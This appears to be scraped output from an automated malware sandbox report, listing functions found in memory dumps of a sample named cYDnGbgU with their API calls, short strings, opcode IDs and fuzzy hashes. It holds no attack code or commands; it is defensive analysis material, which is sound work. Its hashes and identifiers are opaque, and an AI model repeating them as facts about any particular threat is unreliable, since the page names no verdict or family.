API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 28ecd096484b7a17d904ab796bdc0ceea25c7795a33ecf1872e8c48cb52e231c
Instruction ID: 7f20b41581e70b1ef5880ebb3393ee5fe01d4ab4c362161a12218d446c071d0b
Opcode Fuzzy Hash: 28ecd096484b7a17d904ab796bdc0ceea25c7795a33ecf1872e8c48cb52e231c
Instruction Fuzzy Hash: F51120B6C007498ECB14DF9AD844ADEFBF4AB89320F14841AD828B7650C378A545CFA1

Function 07150A44 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 07152496

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9ec267c131d6b37968091fe9d71e54cbcbbee9bf10a8f7af51034432ac33ceab
Instruction ID: 013e12ec1a2484ec267a6bf4f27e459eedf7d2473f27d6cd9ca40ebb967a13f6
Opcode Fuzzy Hash: 9ec267c131d6b37968091fe9d71e54cbcbbee9bf10a8f7af51034432ac33ceab
Instruction Fuzzy Hash: 7D1120F2C00309CFCB14DF9AC544A9EFBF4EB88220F10841AD829B7280C375A545CFA1

Function 071582D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071582B5), ref: 0715833F

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ca93447c2e1890a58eb15534e80d7f535c8ddb74f6a2f77c650ba310e6bf91aa
Instruction ID: 917109eaf9203969eb26b3d43e69ec4c6ad2f6612d334f5bc9adfafbbb4277b4
Opcode Fuzzy Hash: ca93447c2e1890a58eb15534e80d7f535c8ddb74f6a2f77c650ba310e6bf91aa
Instruction Fuzzy Hash: DB1133B58003498FCB20DF9AD949BDEBBF8EB48324F20841AD518B7780D774A544CFA1

Function 07156EB4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07158BFD

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6a757bedf3d9d48f3a0f1ccc7499d9a020fe82cb197229c7592e3bef76ce9828
Instruction ID: af986ce42fdf6c4fa1e1a1bc669e659d1be2e4e9d5e2a488b2e2f763507b948a
Opcode Fuzzy Hash: 6a757bedf3d9d48f3a0f1ccc7499d9a020fe82cb197229c7592e3bef76ce9828
Instruction Fuzzy Hash: 341103B1800748CFCB24DF9AD949BDEBBF8EB48324F108459D529B7280D379A944CFA5

Function 07158BA1 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 07158BFD

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: de7588b0f888f0f09d9b075d365ccf0e70fb24d302c3da359eab7a1dc064fb48
Instruction ID: 9e5304cb3abc45377a325017a37b7cc1f8f73c8d1b19d595cb0cb7843161c1bc
Opcode Fuzzy Hash: de7588b0f888f0f09d9b075d365ccf0e70fb24d302c3da359eab7a1dc064fb48
Instruction Fuzzy Hash: 351133B5C00348CFCB10DFA9D549BDEBBF4EB48324F24845AD568A7280C379A944CFA1

Function 07158311 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071582B5), ref: 0715833F

Memory Dump Source

Source File: 0000000D.00000002.4162157991.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7150000_cYDnGbgU.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 519f5ab9b7c9c231f6c3c0405058492788737d0f706d46bb33660981873fa014
Instruction ID: 1c1e93227546bbd376e66a468c8ebc9b70fdcbaddec00a07edb614d6db787d77
Opcode Fuzzy Hash: 519f5ab9b7c9c231f6c3c0405058492788737d0f706d46bb33660981873fa014
Instruction Fuzzy Hash: C1F0F4B5900209CFCB14DF99D44879EFBF4AF88324F24845AD529A7290C778A544CFA1

Function 071CDB6D Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

PHdq, xrefs: 071CDCC9

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: 51d7a8bb72420bfcecc8d6f48921e4f6378412d04668ba0a27c5a81c9e40f7fb
Instruction ID: 79c3f5fd96c2ed007aafb093f30ba2b7ea2f8c9d8284be9e681210f811f28ae9
Opcode Fuzzy Hash: 51d7a8bb72420bfcecc8d6f48921e4f6378412d04668ba0a27c5a81c9e40f7fb
Instruction Fuzzy Hash: FB41A4B0B1034A9FDF25DFA4D8906AEBBB2BF96300F14452DD445E7284DB70D942CB91

Function 071C4821 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

XPiq, xrefs: 071C495D

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: XPiq
API String ID: 0-3497805733
Opcode ID: 832a03b30df474a7e117e8013ce47cecf28e2b4446b66d70504405ec73b56d05
Instruction ID: 817ff948996e2916f78be08ffdecc16087304114d71c45187427c4865de1165f
Opcode Fuzzy Hash: 832a03b30df474a7e117e8013ce47cecf28e2b4446b66d70504405ec73b56d05
Instruction Fuzzy Hash: D6414B71B002099FEB55DFA9C814BAEBBF6EF88700F20852AD505AB3D5DB748C418B55

Function 071C2285 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

PHdq, xrefs: 071C23D3

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: 1d0f30c5c0f948f2a37149fdfe53ab7291e3d9d1b2b91bccc91ef1e764683c35
Instruction ID: 74ac4ea5f36aa3e43bd86de9ed5c7f150bc27041ede14160a214c72d932cf8e1
Opcode Fuzzy Hash: 1d0f30c5c0f948f2a37149fdfe53ab7291e3d9d1b2b91bccc91ef1e764683c35
Instruction Fuzzy Hash: 6631CEB07003068FDB1AEBB4D45466E3BA6FB99610F14946DD806DB385DF34DD42CB91

Function 071C2298 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHdq, xrefs: 071C23D3

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: PHdq
API String ID: 0-2991842255
Opcode ID: 5656ce744defe787498a7b8484119b156e2e93a1d7ed8797fd2a35050d5d17e3
Instruction ID: ad5fa32eaab656e491ad2a298d319ae9dda9fd164b202ef9499a458e80e2e86e
Opcode Fuzzy Hash: 5656ce744defe787498a7b8484119b156e2e93a1d7ed8797fd2a35050d5d17e3
Instruction Fuzzy Hash: 6731CF707002068FDB19EBB8C45466E3BA7FB89600F20942DD806DB384DF34DD42CB91

Function 071C7FB6 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

$dq, xrefs: 071C7FDB

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID: $dq
API String ID: 0-847773763
Opcode ID: 17aa8f68dfd244d009bb3286ba85331000850d1b84e68ea0f40bc0b35f3624d4
Instruction ID: cb062ba0e0c708a164efae8aa7695d92f2c64b2c0947fea1924143985ea66437
Opcode Fuzzy Hash: 17aa8f68dfd244d009bb3286ba85331000850d1b84e68ea0f40bc0b35f3624d4
Instruction Fuzzy Hash: 35F0E5B2704102CBEF3AC9D4E9C017973E8E764395F21006EDD05831D0D775C912CA50

Function 071C62A9 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c429e9e94e03ccf7e21b6e526d5f972b936d8f60b38ddeff099bf588520982ae
Instruction ID: ab90af7247bea1d50105bca6ca9667d7f08acb30cdfba5a293e0546da4d6c3da
Opcode Fuzzy Hash: c429e9e94e03ccf7e21b6e526d5f972b936d8f60b38ddeff099bf588520982ae
Instruction Fuzzy Hash: 25C180B4A002168FDF15DBA8D594AADBBF2FF98310F248429E805EB394DB34DD42CB51

Function 071C86E8 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf90dcb66bb2dc82cc64506f4c71c8fa7664cb4695c76ef64efcb5241928cdad
Instruction ID: 4637b3d80fed216ea31b99bd9f38a934b80c00f6d00ac4e32a2b54b7c9cea494
Opcode Fuzzy Hash: cf90dcb66bb2dc82cc64506f4c71c8fa7664cb4695c76ef64efcb5241928cdad
Instruction Fuzzy Hash: 19A15C70B002168FDB29EB74C59076EB7B6EF88300F2045A9D809EB394DB35DD86CB91

Function 071C5EB8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a191783e4279eaa470ac32f1017cf3e223a26471dd3ad1c58c863e87c0c5db51
Instruction ID: 04eb8779dcd0f642028360ac14f1a6cacf4c36fd9c51620e274ff637727ebb50
Opcode Fuzzy Hash: a191783e4279eaa470ac32f1017cf3e223a26471dd3ad1c58c863e87c0c5db51
Instruction Fuzzy Hash: BF61B2B1F001224FDF15DA6DC84056FB6DBAFE4620B254439E80EDB364DE65ED4287D1

Function 071C3F69 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06533d358dd84af4c52e89218f37473b6e6f466d61dfbe6721249dd64c65039
Instruction ID: 75373462d560b070ffd66ae576834aefd9f48333c68b58703c428bc6a6f5b30e
Opcode Fuzzy Hash: f06533d358dd84af4c52e89218f37473b6e6f466d61dfbe6721249dd64c65039
Instruction Fuzzy Hash: EA819D70B0024A9FDB14DBA8D5647AEBBF6EF98300F108429D81ADB394DB34DC428B81

Function 071C4284 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6b4605383f5f95bf2b0e6d889b5c452d9b0c92db67c3413125eab5882f4a8fc
Instruction ID: 04b0db5ac9b31a98cb267e12f5baaa28440a37cfed2cd6dd68228765201de4cd
Opcode Fuzzy Hash: a6b4605383f5f95bf2b0e6d889b5c452d9b0c92db67c3413125eab5882f4a8fc
Instruction Fuzzy Hash: 5B915F74E0021A8FDF21DFA8C850B9DBBB1FF99300F208599D509BB295DB70AA85CF51

Function 071C4298 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea9ea141c5a5b6e4b204ec9e9673d1f0c6d94ee367ac0ae8443c932e9deafb26
Instruction ID: ccad347d57b251e0feea5b249553155fdfc742142cf3f30c1f5d9a22ddb686c0
Opcode Fuzzy Hash: ea9ea141c5a5b6e4b204ec9e9673d1f0c6d94ee367ac0ae8443c932e9deafb26
Instruction Fuzzy Hash: 2D913274E0021A8BDF21DFA8C850B9DB7B1FF99310F208599D909BB395DB70AA85CF51

Function 071CEBBA Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7d1ea9904b09c90b9737c5fa960124d3834e7ea30b63d887dcbdd21dadcd3c0
Instruction ID: 5ff58c4a5fab1be96e68b1a091d92de5a127f896bbfe958dd93a1ba4345335e3
Opcode Fuzzy Hash: b7d1ea9904b09c90b9737c5fa960124d3834e7ea30b63d887dcbdd21dadcd3c0
Instruction Fuzzy Hash: 2E713EB0A002099FDB15DFA9D990AADBBF6FF98310F148529E405EB394DB30ED46CB51

Function 071CEBC8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96597f8b4578c2ea162f410225c13ee495c4f34ae59b3f6c82a4173ae755f40
Instruction ID: bcf54a2a55a22235cf24da7525b09426c29a24a72cf4f909209c6e77014863c8
Opcode Fuzzy Hash: f96597f8b4578c2ea162f410225c13ee495c4f34ae59b3f6c82a4173ae755f40
Instruction Fuzzy Hash: 6D712EB0A002099FDB15DFA9D990AADBBF6FF98310F148529E405EB394DB30ED46CB51

Function 071CFD28 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30abd0b6003462deaa945fc57216a0e6a9119ed01b12331cde5624dec50ebbc
Instruction ID: d433a722ad047a93632931dca0f99cca52abc0e2d50653bad7189a61cf28d6c7
Opcode Fuzzy Hash: b30abd0b6003462deaa945fc57216a0e6a9119ed01b12331cde5624dec50ebbc
Instruction Fuzzy Hash: 6A51E6B2A00106DFDB24EBB8E4546ADBBBAFF45311F10487DE005E7294DB358957CB81

Function 071CF6D1 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2a5fc9f06dd7015a34b770831ab153a33fac910853c01821383902d0b36823
Instruction ID: 1803117e6e0a988d7e8e99e16a1dcdff46f3155d58da4bf4738e7372aa914569
Opcode Fuzzy Hash: 2a2a5fc9f06dd7015a34b770831ab153a33fac910853c01821383902d0b36823
Instruction Fuzzy Hash: E151FBF17102165BEF2196ACD85577E26AFDB9D711F20442AE10AD33E4CF2CCC8297A2

Function 071CF6E0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c90a22538ae6af17b2143371193677456361f5b05948459e69d84f0721a53098
Instruction ID: adf8d8e085a43b421c9af034bb2da305574e9c0d019c534ba4cbbf9306eecabe
Opcode Fuzzy Hash: c90a22538ae6af17b2143371193677456361f5b05948459e69d84f0721a53098
Instruction Fuzzy Hash: A451D6F17102165BEF2596ACD85473E269FDB9D721F20442AE50AD33E4CF6CCC8297A2

Function 071C50D9 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e206ed0d86bf8c0de918071dc028740048a8c196ab1a44a39a9956bcb4c9408
Instruction ID: 8172ceb68e75b891f13d8b5868cd62da0f0cc14697a24d7f77954a60b28474a0
Opcode Fuzzy Hash: 1e206ed0d86bf8c0de918071dc028740048a8c196ab1a44a39a9956bcb4c9408
Instruction Fuzzy Hash: 7D4161B1A0060A8FCB21CFE9C8846AFFBF6FF65310F20492AD115D7691D334B9558B91

Function 071C2148 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9e72e7e6d047f1798dc93f9098d558cd9cf3e837a426e0e93238bf79b656d4
Instruction ID: 6f8ff95e288c16194aa4a4438e4028e25d99e0d8434dd210ba1fb3a1de58dd97
Opcode Fuzzy Hash: 2b9e72e7e6d047f1798dc93f9098d558cd9cf3e837a426e0e93238bf79b656d4
Instruction Fuzzy Hash: C631A374A042169FCB1ADFA4D85469EB7F2FF99310F10852DE915EB390DB70AC82CB50

Function 071C2158 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f8959e1b8d7fcb410a696eff524036605cd0120968d694b62ed3b847f18500
Instruction ID: 2ed2c84f6123866b01be0b54ad48f611c40ae2423fe9bcda4a5e6c961937d8df
Opcode Fuzzy Hash: f6f8959e1b8d7fcb410a696eff524036605cd0120968d694b62ed3b847f18500
Instruction Fuzzy Hash: DB316D70E1060A9FDB19DFA4C95469EB7F2FF99300F108529E916EB390DB70AC82CB40

Function 071C3B71 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626df5fb76969377f162d3171d65910df0cae75fa592a63c1a4b0c121f8a7092
Instruction ID: 68569ac6dade9e4f2267cb75fa91a56ecec13a8137db0281eb158c08be3de8ae
Opcode Fuzzy Hash: 626df5fb76969377f162d3171d65910df0cae75fa592a63c1a4b0c121f8a7092
Instruction Fuzzy Hash: DE31E6B5B102058FDB11CFB8D880AEEBBF5FB48720F10802AE915E7390E734D9418B95

Function 071C3B80 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162dacf56f49ada69f95d5388c8a996bcd1e6b15dc1a85306ed279337fcd3e01
Instruction ID: c9d6edafadaed38aa260d2702d23f28d94ac57a1753696ab98b2687f869ae52e
Opcode Fuzzy Hash: 162dacf56f49ada69f95d5388c8a996bcd1e6b15dc1a85306ed279337fcd3e01
Instruction Fuzzy Hash: 6C21AEB5F102058FEB14DFA9D980AAEB7F5FB88710F10802AE915E7390E734DD018B95

Function 0189D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4147989376.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_189d000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fdbdf3c713cae05de55013fe232b3e619908a5f9378ed30d1924c2b830b4eaf
Instruction ID: f36378259db96b8bcad151e8c46255ccc9d5c7f7739c0da73302c540cc3082b6
Opcode Fuzzy Hash: 8fdbdf3c713cae05de55013fe232b3e619908a5f9378ed30d1924c2b830b4eaf
Instruction Fuzzy Hash: 152128B16042049FCF11CF58C9C4B16BB65FB84314F28C66DD8098B342C736D446CA65

Function 071C5258 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caee7ec650ce1d73c871f148dd3a8d3bc62d9899d031e7f9fc88663f6538bd79
Instruction ID: cf7f4f59d266ae1a81b4d62190f920a31adaede51bf6989cde37019999d172a7
Opcode Fuzzy Hash: caee7ec650ce1d73c871f148dd3a8d3bc62d9899d031e7f9fc88663f6538bd79
Instruction Fuzzy Hash: B921C3B1E042068FDB22CEE9C4C076EBBF2EB55311F25887ED059DB282D374E9508B91

Function 071C3EC8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c49d3a83e9935a12d8673afcd7bdb3a5063987953cedd21aa7d33401c8f5c54
Instruction ID: 921493321dca0dad0c9336a793e36f16ad638c63a94402010c3f238fdafe7e5a
Opcode Fuzzy Hash: 9c49d3a83e9935a12d8673afcd7bdb3a5063987953cedd21aa7d33401c8f5c54
Instruction Fuzzy Hash: E20192717041111FDB22D6BDD85176BB7EADBC6720F14C82AF00EC7395DA65CD4283A2

Function 071C3C90 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c310593f175c71ab76e30368c096eb997dd23e94d4c29ad95df71a3679a724
Instruction ID: 82b089f1d9ebbc19df57e17fbaa036e43d01e8eeec24230fc603fba77aa22a65
Opcode Fuzzy Hash: c5c310593f175c71ab76e30368c096eb997dd23e94d4c29ad95df71a3679a724
Instruction Fuzzy Hash: 30118235B141195FDB58D668C8546AE77AAEBCD710F008039D40AE7388DF74DC024B92

Function 071C86DB Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be39d004c5730f1acdedbaeaf3b195f87bcbc711e9891b83ee4037c9dd046b3
Instruction ID: dbb62cd44f849ac5397c61c27145327494092e7ac0b9011a026dc524c35f2a89
Opcode Fuzzy Hash: 1be39d004c5730f1acdedbaeaf3b195f87bcbc711e9891b83ee4037c9dd046b3
Instruction Fuzzy Hash: 2A11E535B002195FDF24DB68E9913AA77BAEB99311F1004BAD10DE7380EB34DD428B92

Function 071C9FC0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf259769db40108d2c73cacb78cf8f2ea7baff6c0bc6752ed5166358813d901e
Instruction ID: f83bbb22e90fce322e8869624a58ed799da30f3a17227f10b1b905d39583338c
Opcode Fuzzy Hash: cf259769db40108d2c73cacb78cf8f2ea7baff6c0bc6752ed5166358813d901e
Instruction Fuzzy Hash: DF11F9B17001250FD712DABCE45075A7BDADB5AB20F14C42DE109CB3C0EB65DC428781

Function 071C3948 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4caa9d6eb53ca42779df549d44927ad489735f1def98fb9363efe0f1f3aab291
Instruction ID: 954296ef3a46f1ebbc7ce61887bb23ddc022b204e0b34055ff1ee25a142678cf
Opcode Fuzzy Hash: 4caa9d6eb53ca42779df549d44927ad489735f1def98fb9363efe0f1f3aab291
Instruction Fuzzy Hash: C421E3B5D00259AFCB00DF9AD985ADEFFB4FB49310F10816AE518B7280C374A544CFA5

Function 071C3C7F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 867ef87cbb07d9bf6112a67f588e48b14b115a4c8db73ca82247a2af7c3672bb
Instruction ID: 154ba5bd0cdedb3730c97275d968d34974a393df320f86d584d70ba62897151d
Opcode Fuzzy Hash: 867ef87cbb07d9bf6112a67f588e48b14b115a4c8db73ca82247a2af7c3672bb
Instruction Fuzzy Hash: D201B136B1001A5FDB5996B8DC546EE77BADBC9A10F40813AD40AE7284EF24CD068B92

Function 071CEE37 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4162764784.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_71c0000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f465be47c8f9052be20296457eed133ff8146e269c9164b809618fceef0807
Instruction ID: 728c73e1299c2fa78ef279b18aeb88d99f9f6133774b9430dadfd81a52dcfc36
Opcode Fuzzy Hash: 20f465be47c8f9052be20296457eed133ff8146e269c9164b809618fceef0807
Instruction Fuzzy Hash: 6101DFB1B044111FCB22CABC945077E67E6EBDA651F14882AE00AD73D0EA69CC074385

Function 071CC888 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

